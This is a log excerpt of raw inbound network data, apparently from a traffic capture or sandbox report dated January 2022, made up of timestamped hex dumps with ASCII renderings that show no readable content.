                                                                                                                                  2022-01-11 22:39:10 UTC4774INData Raw: 95 14 15 0e 08 0d 3e e1 b1 a8 c9 5f e0 08 ed 9e 92 43 27 03 33 7f 1b ad 7f ac fb 1e ae 87 2f 4c bf 5f 2b bc 72 d3 c4 9c 71 ab 81 bf c8 83 c6 a4 95 16 51 dc 5d 3b 9b 21 36 79 50 b6 0d ee b5 8d 1b 1c 7a de 73 8a f2 c0 4c 51 80 cd 60 0f af 6f 2c 34 91 c4 31 10 31 10 f8 a4 e8 df 90 8d be a1 ea d3 c2 60 d1 53 1f 4c 32 2b 09 90 cd 48 e6 dd 13 3c ca ca 4c ca 34 83 32 ff 71 35 5c fe 5d 2f cb d5 0f 75 e3 8e 2e 22 2f 27 41 6f ff b3 c7 ad f0 bb 73 18 35 c5 da 3b 94 f1 c3 9d 66 9c c1 0a af b7 c0 ec ab 08 97 96 61 e4 e0 9f 74 50 52 5f a4 ef fe c4 1f 50 69 c9 8a d0 c1 1d 62 1b 79 e8 44 84 48 97 f8 17 83 69 81 ca 42 b1 02 92 11 57 4f 73 e3 ed c7 fc 41 76 3e a1 d4 4c 97 13 aa d4 74 65 f6 89 d9 10 e0 ae 9c e1 ac b8 44 8e e9 ee 9c 84 9f 60 e4 a1 ad 02 fd 2a 24 ad 4d 0c ed
                                                                                                                                  Data Ascii: >_C'3/L_+rqQ];!6yPzsLQ`o,411`SL2+H<L42q5\]/u."/'Aos5;fatPR_PibyDHiBWOsAv>LteD`*$M
                                                                                                                                  2022-01-11 22:39:10 UTC4790INData Raw: e4 19 74 21 f4 6b 3f 0f 8d b4 4a 8a 8c 17 a6 17 c9 29 73 13 70 59 54 e5 bf d3 b7 0e ff 6a 41 a3 0f fa e5 5c 7a 48 17 fa 9e 94 b9 c0 cf 8c b5 c1 65 51 fa 42 b0 da bf 10 03 24 58 a7 49 6f 9b e9 22 c9 ec 41 9a 0f 92 5e e3 ae 0b ba e6 45 e8 93 09 24 59 dd 1f 3b a0 ae f4 35 4c 17 55 74 48 4a 86 f1 6f 78 8a 16 d4 ed 3f 65 d1 13 f7 f5 6c 77 3e 86 7c 70 e9 af 3a 14 47 4d 44 10 f3 49 f7 db 5c 22 70 f0 5e cc 23 c5 1b bc bd 3d 9b 8a a4 40 45 b4 b7 6f a3 e8 cf d8 07 45 4b 8e 34 94 08 65 29 ea 11 d9 7c 00 ae f5 1c 5d b7 95 95 d2 a7 4a 42 1f 45 53 58 83 a0 b3 ee a5 44 fe a3 c7 b1 ae f4 1b 4b 33 61 75 97 ff 24 c0 9b 35 e5 78 aa 4d 2f d7 c4 b3 ad e5 80 5a e3 3f a4 88 f2 db e2 8b 4b d5 c5 fd 49 90 08 37 73 4e 15 12 81 c6 f7 69 b7 da 3c f3 a2 f6 8d 06 5b a2 27 0a ea 11 29
                                                                                                                                  Data Ascii: t!k?J)spYTjA\zHeQB$XIo"A^E$Y;5LUtHJox?elw>|p:GMDI\"p^#=@EoEK4e)|]JBESXDK3au$5xM/Z?KI7sNi<[')
                                                                                                                                  2022-01-11 22:39:10 UTC4806INData Raw: 0f 05 1f 43 5a 13 f6 c3 94 1f 05 b3 9f 09 09 43 97 a1 a2 f5 bd 06 28 21 f6 d5 ad 50 8e b5 10 d7 a7 26 05 a9 84 e4 82 1f a2 c7 84 99 e9 3b ca f2 b6 23 27 83 86 a4 d8 40 b5 59 bd a5 eb 2d d5 81 f0 4d 3e 4b d0 bf 13 ff 98 80 fc a2 ea 95 61 ee f6 66 78 80 09 1e c4 9d 63 c7 69 f1 b6 a0 28 68 93 8d fd e3 0c f9 98 58 0a b6 d8 ab 55 39 c4 e6 fa 59 d9 55 b9 40 11 26 92 09 60 bc 12 00 ab 8a e7 2c e0 2e 3c 15 09 62 f7 10 13 99 2b 25 3a 9a fb 4f f6 c0 7a 8c 5a ed ca cc 56 8c 35 85 ab ea 31 50 a7 47 31 82 27 e5 d2 29 fd e5 49 d1 66 e0 be f9 c9 2b db 71 bf b7 e7 80 9d 67 07 e0 27 16 37 71 77 3e 0d e7 13 96 27 7c 2e 3f 4c a9 e9 76 57 4c e2 e3 6d 80 ed 9b 39 6d c9 17 4d e0 b0 1c f4 bf f0 64 84 97 d3 80 f6 01 22 5c 6f 88 83 96 3b d7 5f 29 b9 cd dd bc f8 04 b9 56 7c c7 80
                                                                                                                                  Data Ascii: CZC(!P&;#'@Y-M>Kafxci(hXU9YU@&`,.<b+%:OzZV51PG1')If+qg'7qw>'|.?LvWLm9mMd"\o;_)V|
                                                                                                                                  2022-01-11 22:39:10 UTC4822INData Raw: cb e2 c7 40 bd 2f 93 39 80 cb 5f c8 c5 e5 45 69 16 26 fb df 55 e3 cd 4f ac 4e 94 de 61 08 0e dd 13 65 2a ba 4f 49 66 a4 af 0c e3 9b 74 c5 63 7b 25 24 41 9a 0e 0b 2b 34 c4 a2 bd cf 12 4f 51 85 f8 ca 3a f1 ba 02 b7 99 17 0a 2e 68 a0 38 0e 7a 4a 64 83 c5 ee a7 d4 3f 7e 9b bb 91 ab 25 6d ee 79 10 a3 c2 59 79 96 f8 df 2b ca ae 42 9d 8a 33 bd 5c fa 98 36 f0 52 bb 19 a6 61 32 d4 ff 7f 5a 5d 7d 23 2b 51 f4 82 12 81 80 16 f7 51 9e 46 e2 2f 31 3f 14 51 28 62 c3 05 ac cb b6 87 03 82 62 63 6d 24 7e fd 30 07 d8 82 83 55 8d 19 a8 8d b3 d1 c3 26 f9 45 35 b0 31 d8 f3 ec 39 bc 70 19 16 bd 8c e3 c2 d8 ac 57 81 3d c1 16 ec 51 41 64 7c 15 39 3f c3 72 6d 2a 69 f1 dc 59 aa c5 f0 06 2b 49 a4 f7 92 77 7c 61 19 85 4d 91 d3 9a fa ff 05 00 cc d6 81 52 87 76 26 c3 44 1d 25 d6 ac 9b
                                                                                                                                  Data Ascii: @/9_Ei&UONae*OIftc{%$A+4OQ:.h8zJd?~%myYy+B3\6Ra2Z]}#+QQF/1?Q(bbcm$~0U&E519pW=QAd|9?rm*iY+Iw|aMRv&D%
                                                                                                                                  2022-01-11 22:39:10 UTC4838INData Raw: 03 72 31 79 9c 2b 19 d9 d3 03 90 84 40 14 d4 41 05 9b 23 0a c6 26 f7 a3 73 c4 27 bd 70 ba ff f3 0b ba 39 4c 8d 36 df 34 58 0e c5 bd 38 a9 02 2c 59 1e 04 f7 4c 79 25 93 95 c0 23 89 f6 23 27 2f 54 63 6e b4 45 58 ba 31 35 5e c0 8d 7d 02 96 62 88 dc e8 5d 8a 2a f9 fa d9 c4 f4 51 5a 06 2c fe 9a 9b 54 92 73 09 e7 22 59 12 74 48 52 01 0a 60 39 73 5d 19 83 50 a3 4f a2 81 24 0a 7e f2 f8 eb 04 6f b8 23 85 fa 4e a2 ca 77 90 15 5e 57 23 b3 6e ec ff 62 7b 5b 5a 51 15 a5 24 02 15 08 b2 a1 d7 33 83 6b c7 d4 e8 e5 32 26 e0 bd 99 7a a6 93 63 49 73 b6 1d 0a 9c 15 96 fb 78 90 93 05 76 3e 43 5b e5 17 1b a1 a9 c2 1d 72 ac a6 1a 15 f3 88 cd ba 44 d2 73 bf 06 1d ee 67 45 da 9d 2c 22 02 8d ba 18 d0 e6 f7 94 7f 48 c3 08 77 80 3e d8 0d f5 39 15 cf dd 57 9b ce 0c cd 01 70 56 e0 79
                                                                                                                                  Data Ascii: r1y+@A#&s'p9L64X8,YLy%##'/TcnEX15^}b]*QZ,Ts"YtHR`9s]PO$~o#Nw^W#nb{[ZQ$3k2&zcIsxv>C[rDsgE,"Hw>9WpVy
                                                                                                                                  2022-01-11 22:39:10 UTC4854INData Raw: 82 48 99 ac 12 72 37 24 6c da b8 eb 92 f9 b4 0d b2 2c d1 77 3f bd e3 a4 cd 90 5f c8 73 3f f5 d4 38 7e d9 34 c6 08 f8 e2 62 ef b9 04 b0 fa e6 e2 36 df bd eb 96 a1 ba fb a3 e1 94 a7 fa 46 c7 57 2e 53 e3 a5 ac 5b 2f 6b 4f 42 6f 4f 0d 62 f3 47 60 ac 50 2b 1d a7 a0 e3 60 ba b5 e5 36 01 7c 04 ee 91 e6 a8 d4 c0 4a e5 5c 8f ce 87 0b bd e4 6d 1d 2f c5 83 25 92 4d 0d 54 72 0c 4a 73 bc 3f d6 09 fe a0 aa 46 b1 07 cf 1d 83 a4 20 b7 ae 54 7a 68 ce 34 f1 42 88 1a 89 6c f6 f2 e6 ea 3a 98 01 c2 e4 74 6f fe d0 e3 b4 70 21 23 3c 00 fc 27 5a 47 90 a4 06 4b ce a2 1e b4 e0 bb c1 19 7f 6d 26 6f ae 54 35 d4 d5 0d 97 d0 85 1e ac ae 07 df 72 0f 59 6c a5 7f 13 67 9c 6d 77 57 7d ce ce 2e ae 74 75 18 7a af 32 6c d3 86 d9 f7 46 1e 1b b6 3e 13 f5 5e fd cb 42 2d 35 5c ce 87 02 7e 62 8b
                                                                                                                                  Data Ascii: Hr7$l,w?_s?8~4b6FW.S[/kOBoObG`P+`6|J\m/%MTrJs?F Tzh4Bl:top!#<'ZGKm&oT5rYlgmwW}.tuz2lF>^B-5\~b
                                                                                                                                  2022-01-11 22:39:10 UTC4870INData Raw: 42 0b c6 90 97 f2 de 09 ab 0a 67 5e 61 1d 6b 97 c9 07 ef 09 fd dc d0 19 bd 94 8d 46 5b da e8 e7 28 32 00 91 db bf 46 e9 c1 38 08 4e 3a d6 04 c8 8f 26 59 7b c0 1d 23 51 fb a4 2b 0a 09 f6 3e 48 22 ac bb d7 18 44 29 47 48 1e ed 81 81 b7 77 7b be 0f 6d 47 c6 df 56 5b 7d e1 28 c6 50 9a 79 62 0f 3a fc 88 67 9c 6a f3 eb 31 c8 c9 41 90 aa 35 19 0a f7 09 7a 79 bb 52 99 df 15 5e 63 3a 2e d5 71 a6 fb 1d 6f 4a ee 80 c6 9a b8 22 25 e2 ce 45 46 13 9b 6b 4e 21 0a 31 df c9 63 0e 8b ea f5 f0 85 da e6 0b 43 67 34 3d 9a 01 01 01 5b 12 cf 77 4f c2 0b b4 cb 1a 91 73 62 b6 b9 ab 2a 83 2a ed 1a e3 de 53 a5 1e 5f 11 eb ed f0 1b 25 60 48 08 7f 2c d7 c1 d4 32 d7 1b 7b 93 6c 13 37 7f f8 2a 3e a0 b5 7a 2b 13 4f 1c 3e 53 0d 9a df fe 7f 6a d2 26 cb 8c 2c 84 34 02 26 74 85 7b a1 7e b1
                                                                                                                                  Data Ascii: Bg^akF[(2F8N:&Y{#Q+>H"D)GHw{mGV[}(Pyb:gj1A5zyR^c:.qoJ"%EFkN!1cCg4=[wOsb**S_%`H,2{l7*>z+O>Sj&,4&t{~
                                                                                                                                  2022-01-11 22:39:10 UTC4886INData Raw: bd c7 dd 70 e8 1d 8f 10 4c 3e 0b a0 92 0b df af b7 98 1a 09 13 22 57 6f 3b f8 f3 02 5f 2d 49 ee 2f 0f ee 84 53 e7 da af e5 37 da 12 c1 f1 28 f1 ae f2 eb c5 c8 4a f2 43 46 1d 83 d2 7c 2c cb 94 7f 7b 3d ca 81 6e 67 72 b6 81 22 25 b0 08 4a 50 9d d8 97 d8 56 0c 80 b5 47 13 70 d9 f4 74 2a c8 aa ed ea 15 3f 62 53 bd 06 aa 95 03 9b 35 26 94 8a d1 4b ff f1 1c 60 e1 40 8a 0a f0 5f f2 c4 6f 19 c6 eb 96 eb e7 2f 07 90 d3 88 f7 f1 31 0a 0a 19 e5 ce d4 3c c6 e2 42 14 77 ee d3 11 26 25 f9 95 68 b3 3b c2 81 d0 14 d2 73 15 c0 40 bb 18 49 b4 42 60 9b f2 9e d4 0a fe ca 5d 8e 7f 34 21 32 9c 0c 29 6e 72 0d f1 fd 83 83 70 a6 6c 65 b2 4a 0a 98 c6 42 48 75 b5 a8 26 58 f1 73 3a 0e 27 28 50 65 61 e6 26 4f b1 85 38 a1 2a 15 a1 9a e1 21 cf 04 56 1a 31 01 f0 48 f9 07 f8 37 73 a2 8b
                                                                                                                                  Data Ascii: pL>"Wo;_-I/S7(JCF|,{=ngr"%JPVGpt*?bS5&K`@_o/1<Bw&%h;s@IB`]4!2)nrpleJBHu&Xs:'(Pea&O8*!V1H7s
                                                                                                                                  2022-01-11 22:39:10 UTC4902INData Raw: 7a d2 94 93 57 7e 08 de 84 11 28 5e 86 0f f4 59 38 7f 06 72 f6 a9 9c 8c 54 04 3c e1 32 3a 85 cf 41 18 82 6c 75 23 bc 84 87 10 1c d5 d4 3d 8b 88 43 9a 82 2e 29 56 06 0b 01 14 af d6 5e 2f a4 fe 9d a2 2d 37 ad 6e 56 80 65 87 82 2c af 4e e1 75 29 af 3d 48 be db 6c c6 75 10 7a a1 f9 0b 4c 4c 55 fd 53 c1 ff c7 f8 a1 95 09 cf 66 2e 0d bc af a1 3f 35 36 31 8b 0a 49 03 dc 10 35 46 97 0c 75 db 3d 9d b5 e0 4a 5b 9f e8 3c 5d 4b 43 af 57 8a d7 19 8a 8d 78 5f de 8b 0b b5 41 5b d0 74 94 e7 99 e1 e5 d7 fa f1 0e 8d e9 24 cc dc fd ab 93 53 e2 8a c6 b6 bc 6a 46 e9 8a d8 c1 c4 8f cb af 79 1a 99 49 d6 12 80 42 9e 2c 5b 27 83 87 f3 87 0e 25 10 34 c9 26 71 b3 89 83 d0 a8 cf ee e4 b9 84 dc b6 92 88 f3 e2 20 0a 37 c6 88 d3 5f 20 74 85 de 61 b2 7a b6 f1 00 6c 88 cb 75 e0 1c c4 9b
                                                                                                                                  Data Ascii: zW~(^Y8rT<2:Alu#=C.)V^/-7nVe,Nu)=HluzLLUSf.?561I5Fu=J[<]KCWx_A[t$SjFyIB,['%4&q 7_ tazlu
                                                                                                                                  2022-01-11 22:39:10 UTC4918INData Raw: 43 cf bc ee e5 02 51 be 65 c5 93 9a 61 36 98 29 51 83 6a ae 02 fc 19 e1 26 28 02 9d cf 27 b9 a1 9b c1 57 77 5e 9a 67 a2 78 ea 51 09 ca 3e ca 30 d1 a5 f6 8d 94 68 1e 8f ba ec b2 34 af ff 40 8b bf d5 e0 eb c1 48 71 9d c4 a3 05 4b 11 87 2f ce 23 1d cb f0 cc 9b 71 fd 15 93 57 c5 ab 64 bf a2 66 49 18 b2 d0 d2 09 5a 55 f6 f1 e8 0b cc e1 d9 52 4b 84 ce b6 37 dc 3b a1 9f 63 9d 0d 94 c8 03 70 62 f9 54 e4 95 30 1a 03 5c 98 d3 9e fb 7d 58 01 82 0f cf 63 b7 fa 57 fa 24 db 2e 38 9e 3f 73 7c 6f 6d fe 49 38 4b d3 81 e2 71 74 82 5f b5 9f e8 a2 cd 13 39 a7 d6 5b 58 f3 4c 80 67 3e 85 5a 31 99 7f aa ab a9 8e 7a 61 46 e4 f7 2c 2b 34 db e6 0f 36 21 04 d2 1a 41 60 85 88 4a 6a a1 1d 08 ff 01 ef c5 d4 dc b6 ad 60 a1 10 7b f5 ea d1 15 ac 47 a4 90 f3 ee 94 42 b5 c9 af 75 38 9f e2
                                                                                                                                  Data Ascii: CQea6)Qj&('Ww^gxQ>0h4@HqK/#qWdfIZURK7;cpbT0\}XcW$.8?s|omI8Kqt_9[XLg>Z1zaF,+46!A`Jj`{GBu8
                                                                                                                                  2022-01-11 22:39:10 UTC4934INData Raw: 95 a8 6a a7 99 ab a5 ac 07 08 18 9c bf a7 6c fa 1a 3e 27 c2 df 68 d7 d1 15 fb ce 9a 96 33 a6 30 3a 81 a6 9a 27 dc 74 3e ec 4e 47 5b 5c 09 ae 94 4d d5 95 68 4e a2 e2 68 07 48 e6 03 56 20 7d 2b 6b dc 26 17 83 81 eb f5 03 a5 7c 7b ab 49 e3 33 3e b2 90 86 7a ea 7b d4 59 5a 71 0e 83 db dd ae 72 74 8e 52 d3 26 96 38 b3 a7 10 84 ee f6 0f 3f 0d 9d f9 67 0c 46 f4 4d 75 57 ef b5 06 0a 53 7d 33 0e 27 c9 49 b7 7a ae 84 0f a5 eb 1d 13 94 98 70 91 8a 49 29 6f 2f 48 ff 46 7c 7f 13 07 4c f2 cb d0 fb 36 d8 84 1e ff 2b 82 7e d0 88 15 e0 42 82 eb e9 62 18 9c 9a cb ce 41 ff 3f b7 34 69 0d 08 df b9 80 74 ff 3e 3f 02 1f 9a 1c 60 a3 a1 24 8e 06 ac 1a 21 0f 20 02 1c 7f 47 fb 9a 1b 78 9e 20 57 f0 da 40 c9 63 67 63 56 8a b2 76 10 ca f8 df 5c 64 a7 16 c2 3f d5 12 b2 57 10 8b 70 5a
                                                                                                                                  Data Ascii: jl>'h30:'t>NG[\MhNhHV }+k&|{I3>z{YZqrtR&8?gFMuWS}3'IzpI)o/HF|L6+~BbA?4it>?`$! Gx W@cgcVv\d?WpZ
                                                                                                                                  2022-01-11 22:39:10 UTC4950INData Raw: 23 38 3b 1f 26 87 db f0 f5 8d a4 3a ac ad a5 c4 70 6e c8 0e a8 30 a4 ff d7 ea 3f 2c 22 d0 19 c7 36 1d eb 98 7a e6 da f4 23 9d 33 c7 8b ce bc 46 ab 8e 18 fb 1a db c1 1a a3 12 62 03 4d 8a d3 ab 8f ae 28 ff 26 ab 48 11 2d 32 42 7d bb e8 e0 85 55 1b 1e a3 1f 80 09 17 66 05 8a 4a 7d 0d d6 28 73 ba 3e 5a 94 fa 07 a1 c8 63 73 53 76 90 ec 26 3d f8 69 6c 73 74 3b 72 d6 d7 f2 b8 b3 8e 44 2f 40 ed 92 b7 c8 f9 16 eb 7b 6b 85 cb c1 c1 51 08 17 66 6e bf a6 62 a1 f6 9d f1 25 df 62 a3 94 71 d7 d4 85 96 89 eb 37 f4 71 53 98 75 17 d6 6c 92 57 bf 3b 1f 9e 00 44 c0 8c 8c ae 78 1c f0 db cf 49 a7 c1 5b 43 2f 53 91 a3 c5 83 4b 31 4c 38 2f f2 86 10 e4 2c d9 a8 f6 5e 89 93 91 60 d0 d0 db 6d ff 2a 00 0b c4 32 2b af 77 9d 05 93 6e f1 49 c7 e7 25 ab d1 50 55 fb ae 5b 73 ec b6 21 87
                                                                                                                                  Data Ascii: #8;&:pn0?,"6z#3FbM(&H-2B}UfJ}(s>ZcsSv&=ilst;rD/@{kQfnb%bq7qSulW;DxI[C/SK1L8/,^`m*2+wnI%PU[s!
                                                                                                                                  2022-01-11 22:39:10 UTC4966INData Raw: 48 d9 18 a9 13 49 6b 19 8f 8f fc 43 bf 83 71 15 ad 44 86 ed ac 16 28 4b 97 ab 2f 67 14 ec d9 9d 28 50 da 10 7d a0 5d 8e 41 26 b8 9a 71 ce 92 ce 36 d5 50 91 df ec 43 4a 78 62 de 17 79 23 93 ef 37 ef 42 99 50 f7 d6 27 f3 86 38 66 3f 00 72 a2 9b 9e e7 cb 10 8f 1b ba e0 b5 a8 c3 42 1e f2 c8 f9 35 2e c8 41 33 a1 55 ea 58 16 bc bc 4e c7 eb 48 62 31 d4 98 3f f7 e7 e0 f6 84 2d 1b 58 6d 90 f8 91 7a 34 2b b5 28 d5 91 a8 89 5b 81 f6 83 8e fc 82 cd eb a7 9b cc 9f 14 10 3d a3 c7 16 af a5 73 89 86 5b d6 60 88 ce da 7b 4a 38 6a 3e 86 7a f7 a9 82 38 9d 1c 54 8e 1b b0 91 81 0e 05 67 28 0e de 5c 37 2b 40 af 52 b2 90 75 5c e3 56 06 06 d1 3f 4e 47 26 fa 7b dd 68 1c 6a 1b 99 f6 c1 5e fd a7 2a da 38 b4 76 63 6d 6f e7 70 a5 86 d7 3d c1 5e bf 17 19 3e f1 00 e9 c3 bc 2d 85 d3 78
                                                                                                                                  Data Ascii: HIkCqD(K/g(P}]A&q6PCJxby#7BP'8f?rB5.A3UXNHb1?-Xmz4+([=s[`{J8j>z8Tg(\7+@Ru\V?NG&{hj^*8vcmop=^>-x
                                                                                                                                  2022-01-11 22:39:10 UTC4982INData Raw: 4f 34 db c8 2a 79 f9 48 fa 4a d0 05 67 82 5a 10 05 e0 d9 a9 4d 11 6f 4a e4 af 11 62 ce b0 38 31 a8 05 46 f4 4b 65 dd 01 d5 b2 fc 34 bb e5 88 e5 f7 2e 1e cc 02 2a 3a 12 e8 8a f9 f2 a7 7a 2f c5 dd e2 ae 14 4c d2 79 d7 f3 67 13 ee c0 00 87 ff 68 d8 11 8a 92 35 fe 36 60 e0 1b 7f a5 06 e1 d2 4a 8b 7f a2 59 02 ae c2 88 80 8f 78 3b 7c ba d1 62 b0 5e d0 e7 64 00 c4 ba 70 bc 44 c0 f2 65 e8 55 06 7f cb 24 79 ba a3 d2 3a 13 b5 5f 85 aa e5 45 d2 28 12 76 44 59 3d 3a 3f a1 a8 5e 30 f8 87 07 61 0e 52 c7 9f 3c 69 58 c1 26 06 1e c6 36 76 3f 64 fa 5c e9 d6 22 ab dc 03 07 d1 8e ec 70 33 5a b2 f9 fa ff 4d 5f 74 81 f0 5c 17 8d c4 99 f7 56 ca a0 a7 c5 b5 65 88 43 38 ef a8 0d 3b 34 1f c8 fd 66 cf c8 53 b5 0b 41 e9 9b b0 2f 53 cb 26 6b 19 3b 6c 30 89 b7 65 e8 08 53 de 2d cf 8c
                                                                                                                                  Data Ascii: O4*yHJgZMoJb81FKe4.*:z/Lygh56`JYx;|b^dpDeU$y:_E(vDY=:?^0aR<iX&6v?d\"p3ZM_t\VeC8;4fSA/S&k;l0eS-
                                                                                                                                  2022-01-11 22:39:10 UTC4998INData Raw: af d0 64 86 52 47 fd 15 15 66 86 77 8b 09 f1 0f 56 a2 c5 bb c2 0f 45 af 5a 41 ab 29 f2 58 90 27 5e 5d 33 99 c5 d0 7a 23 6b 03 20 aa 53 b2 d5 89 ed 9f 97 d3 47 8b b1 b1 3d 35 d2 b7 b3 2e 90 94 65 b0 c9 5d 2f 52 87 2f e0 a7 be 72 a8 14 a3 dc 80 25 bb 15 2b c5 fc 45 a9 77 44 74 1b dd 8f f1 6d 08 c2 0b 9f 99 bf 37 62 34 7b ed a0 17 cf 6d 43 d1 b7 25 29 c8 e6 73 c7 cf 00 61 a7 72 8d 25 96 ba 00 6a 3d 5b d6 09 72 0d 38 13 5d e8 aa 09 f0 fe 1e 84 2b dd 05 69 f7 96 be e5 59 e2 84 42 e2 e6 e7 13 e7 b8 64 b3 d0 c1 74 29 1c 27 b9 1e 3a c9 32 e3 71 2f cf 1f f1 01 21 b4 5e f5 ac 6c a4 09 49 40 68 d8 b4 35 9e ac 53 73 08 e7 bd 1a 41 cd 7c 5c 46 7f e3 32 09 aa 25 1c da ac 6c e0 a4 e4 04 e5 cb 2e 80 30 aa 27 4b 3d 85 27 fa 0d 26 d3 dd af 76 9b 51 a2 6a e9 d0 cb 9e 04 d1
                                                                                                                                  Data Ascii: dRGfwVEZA)X'^]3z#k SG=5.e]/R/r%+EwDtm7b4{mC%)sar%j=[r8]+iYBdt)':2q/!^lI@h5SsA|\F2%l.0'K='&vQj
                                                                                                                                  2022-01-11 22:39:10 UTC5014INData Raw: 0e 03 ff c1 bf 37 06 1d d4 b1 38 cd 2a 1f f6 22 00 7a 64 10 29 f3 c8 96 ec 6e 5c 7b 79 e2 47 85 35 02 44 25 c3 4f db 48 12 0e 51 67 73 98 56 d6 75 37 f1 98 5b 35 49 81 3e ec fc 64 48 ff 02 d6 d9 6e f0 e0 f7 71 a1 ca bc cd 0d ab 64 3d 78 c6 1b 46 41 43 d1 8e a2 63 d1 ce ae ae 83 ed 2c c1 c2 f6 d1 85 39 43 00 e0 9e a6 a6 2b 6c 5e d4 17 0d a1 53 e2 c0 04 8e fa 80 67 9d 67 9a ba 08 c7 41 f6 61 1b 37 87 ef a1 1c 6c f1 4e 6e 5a 3c b3 a9 74 61 71 08 62 28 ec 82 49 73 a8 a7 c8 2c d0 e9 53 18 5c 5c ba 59 1d 23 a0 d1 e4 08 c8 e4 fe ee 65 cd f0 c3 77 51 75 ff e2 dc 61 00 57 a3 35 2a 63 f8 9a d0 61 21 3c 83 90 61 61 e5 fc 9e 16 dd ac ab d5 f5 2d 61 7c e2 9d cc 3f df bc 73 29 da 90 df 3b 19 17 ad 84 72 3a a7 6a b8 33 14 8a 86 38 fb 8c 6c e2 32 31 61 cb 26 f0 d7 72 a0
                                                                                                                                  Data Ascii: 78*"zd)n\{yG5D%OHQgsVu7[5I>dHnqd=xFACc,9C+l^SggAa7lNnZ<taqb(Is,S\\Y#ewQuaW5*ca!<aa-a|?s);r:j38l21a&r
                                                                                                                                  2022-01-11 22:39:10 UTC5030INData Raw: d3 f5 fe aa 84 be ec 0e 8d d7 18 8f 4e 05 34 4d 31 67 c7 fe 57 50 69 c7 8f 3b b5 57 36 41 4d 83 bf e9 ee 94 7c 0b 88 04 ab 3a 25 9c 2e ca ec c2 16 c2 c7 d6 84 17 9a 89 8e 6c 15 7b ad e9 74 06 46 b7 52 49 9e 97 d6 59 9a 5f f4 fb 48 bf 74 a0 df 3c c4 7a 9e dd b8 9c ae 97 e2 b6 6d 73 3c bc 6c 6a 8e 29 af f9 c0 ee 05 e2 c5 fc ec b2 de f1 4a ca 3b 9d f7 e1 12 25 74 12 a9 fb 8d c0 ed 41 73 00 66 f0 9d 0a 3e 6b fa 05 53 2f c8 96 ca 79 6a 9b 1c c3 97 27 da b4 9d bd b5 ca 5b b7 10 04 40 2a 24 97 59 c4 ee 77 eb 93 bd 80 df cb 82 da f9 18 06 26 17 46 3b 05 37 5c c8 c0 21 8a 21 03 2f d8 a3 74 6c 09 fa 68 00 c6 8c b2 22 56 65 3a 8d f8 bb 7f 63 ff b7 3f da 8a 3e 62 2b 18 70 e6 f9 aa bf fe 18 b6 4e 47 5c 37 56 4e 76 d5 08 38 13 b9 04 76 c1 64 15 7c e1 13 4d 92 67 16 02
                                                                                                                                  Data Ascii: N4M1gWPi;W6AM|:%.l{tFRIY_Ht<zms<lj)J;%tAsf>kS/yj'[@*$Yw&F;7\!!/tlh"Ve:c?>b+pNG\7VNv8vd|Mg
                                                                                                                                  2022-01-11 22:39:10 UTC5046INData Raw: e3 12 d1 7c 52 70 ed e4 fe 0e 82 1a ce 3b 9a 70 b5 b0 0e ad 51 90 70 3f 99 05 93 43 6a a9 29 91 0c fa 8d 40 ea b2 c8 9e b3 c3 65 79 b7 df 3c 1c 4c 07 d9 a3 0d d0 01 58 07 5d ea f1 3d 28 3b ab 6f 8e 83 ff 87 45 b1 77 27 7d 5b 82 25 65 26 ba b0 83 3a 12 e0 dd 7c 64 6f 61 51 18 63 25 7d 70 5d 52 4e e5 78 6d c4 04 e9 85 cb 2c 0b 4c 30 a0 a2 7c 1f b7 49 05 9f 5f 10 8d 5e fd 34 6d a5 a1 47 ba 59 00 d9 19 fe 75 3c 12 b0 88 4a 38 25 35 2a 02 10 6c 68 d7 42 67 65 07 b3 0c ed 3a 22 46 e4 82 a4 38 f6 ba 39 76 8f e3 2b 2f bb d8 62 b9 96 62 45 0c b9 7d 32 ce c3 99 46 9a 4e bb ad b4 7c 1b d0 23 99 46 aa 4f 86 d6 11 25 1c 49 cf c2 24 68 f5 ed c3 82 7c 14 7d b1 b7 3c 5d 99 33 dc 9b 81 9d 57 c4 f9 8e 58 40 26 a6 ee c6 5f 51 a9 19 5a d8 cf 16 ca 5d 74 93 bc 8f fa d3 97 8a
                                                                                                                                  Data Ascii: |Rp;pQp?Cj)@ey<LX]=(;oEw'}[%e&:|doaQc%}p]RNxm,L0|I_^4mGYu<J8%5*lhBge:"F89v+/bbE}2FN|#FO%I$h|}<]3WX@&_QZ]t
                                                                                                                                  2022-01-11 22:39:10 UTC5062INData Raw: 7a a2 88 23 ed 4e de 7c 1e 0a 6b 61 5b d4 a1 b1 ed af 63 05 3c df b4 09 53 78 2a 34 0f 45 19 24 0f 2f cd 19 4d bb 06 91 15 b8 49 aa dd a1 d5 ab c5 45 6a da 87 e8 8d d5 c2 ae 09 d6 13 62 96 3b 40 51 bc c6 2d 29 92 6a c4 b9 d6 a6 31 b8 f9 82 1e 0d 54 7e 8b 27 27 7f c8 77 cd ce 96 4e 92 2b 95 65 73 ed d4 1f 75 75 75 da 4d fb f6 5e e0 e1 7f ce 76 a4 77 74 16 4c e6 55 af d0 84 d0 1a 85 d5 12 7a 67 cc 6f 86 89 87 c0 11 62 89 cb b5 f5 d7 17 85 fd 17 8d f6 8a 75 0b 92 36 ae 6d 3e 88 5b 29 ec 41 b4 ec 4a 8b 0f 16 ce 7b dd ee e3 aa d7 92 9f 97 96 2e 65 a4 79 82 3b 7a 1d 89 88 50 07 ac 86 6d 8e f3 99 ba 3c 06 2e bd 38 e3 80 d2 05 cc b3 6f 2c d7 45 91 6e 81 e1 49 e0 88 4f 80 09 ef 77 9e 04 66 6f 4f 77 6f 4e cd c1 02 df e2 16 5a ee 1f ae 79 3e 8f fc 16 c0 32 61 d7 63
                                                                                                                                  Data Ascii: z#N|ka[c<Sx*4E$/MIEjb;@Q-)j1T~''wN+esuuuM^vwtLUzgobu6m>[)AJ{.ey;zPm<.8o,EnIOwfoOwoNZy>2ac
